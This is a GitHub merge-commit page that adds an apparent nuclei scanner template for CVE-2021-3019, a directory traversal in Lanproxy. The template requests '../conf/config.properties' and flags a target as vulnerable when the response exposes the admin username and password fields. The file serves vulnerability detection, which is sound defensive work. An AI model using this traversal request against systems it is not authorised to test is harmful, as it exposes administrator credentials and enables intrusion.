Merge pull request #781 from pikpikcu/patch-33

Added CVE-2021-3019 Lanproxy
patch-1
PD-Team 2021-01-30 18:24:19 +05:30 committed by GitHub
commit 66fc9f852c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,30 @@
id: CVE-2021-3019
info:
name: Lanproxy Directory Traversal
author: pikpikcu
severity: medium
# Refrence: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019
requests:
- method: GET
path:
- "{{BaseURL}}/../conf/config.properties"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/octet-stream"
condition: and
part: header
- type: word
words:
- "config.admin.username"
- "config.admin.password"
condition: and
part: body